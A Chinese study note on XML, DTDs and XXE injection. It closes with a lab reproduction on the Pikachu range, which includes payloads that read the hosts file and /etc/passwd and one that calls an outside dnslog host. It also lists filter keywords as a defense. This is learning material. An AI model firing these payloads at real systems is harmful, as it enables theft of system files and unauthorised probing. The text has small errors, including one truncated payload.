XML基础
xml是可扩展的标记语言,设计用来进行数据的传输和存储,结构是树形结构。
有标签构成,有点像HTML语言,
xml被设计用来传输和存储数据。
html被用来显示数据。
**xml文档**
xml文档有根元素,根元素下面可以有多个子元素,标签 <></>需成对出现
<?xml version="1.0" encoding="utf-8"?>
<note>
<from>John</from>
<heading>Reminder</heading>
<body>Don't forget the meeting!</body>
</note>
XML DTD
DTD全称为,Document Type Definition,中文翻译为文档类型定义,是一套为了进行程序间的数据交换而建立的关于标记符的语法规则。
文档类型定义(DTD)可定义合法的XML文档构建模块。它使用一系列合法的元素来定义文档的结构。DTD 有两种声明的方法,一种是内部声明,一种是外部声明,我们下面开具体看一下:
DTD 的内部声明:
外部需要一个DTD的文件,比如:note.dtc
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE note [
<!ELEMENT note (to,from,heading,body)>
<!ELEMENT to (#PCDATA)>
<!ELEMENT from (#PCDATA)>
<!ELEMENT heading (#PCDATA)>
<!ELEMENT body (#PCDATA)>
]>
<note>
<to>Tove</to>
<from>Jani</from>
<heading>Reminder</heading>
<body>Don't forget me this weekend!</body>
</note>
DTD的外部声明:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE ANY [
<!ENTITY content SYSTEM "filename">
]>
<note>
<to>Tove</to>
<from>Jani</from>
<heading>Reminder</heading>
<body>Don't forget me this weekend!</body>
</note>
XXE漏洞
XML External Enti ty lnjectionxml外部实体注入漏洞
XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载。
导致可能加载恶意外部文件,造成文件读取,命令执行,内网端口扫描,dos攻击等。
XXE的防御
禁用外部实体的方法
过滤用户提交的xml数据,如关键词:<!DOCTYPE和<!ENTITY,或者,SYSTEM和PUBLIC。
皮卡丘靶场漏洞复现
随便提交一个xml文档
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY name "hello world">]>
<root>&name;</root>
输入hello world 说明我们提交的xml数据被解析了。
读取hosts文件
<?xml version="1.0" encoding="gb2312"?>
<!DOCTYPE a [
<!ENTITY test SYSTEM "C:/Windows/System32/drivers/etc/hosts">
]>
<a>&test;</a>
利用file协议读取/etc/passwd文件
<?xml version="1.0" encoding="gb2312"?>
<!DOCTYPE a [
<!ENTITY test SYSTEM "file:///etc/passwd">
]>
<a>&test;<
这里用dnslog检测命令执行,到dnslog官网申请一个子域名做测试
如果有访问dnslog子域名说明能执行命令。
<?xml version="1.0" encoding="gb2312"?>
<!DOCTYPE a [
<!ENTITY xhh SYSTEM "http://fshxc1.dnslog.cn ">
]>
<a>&xhh;</a>
个人学习笔记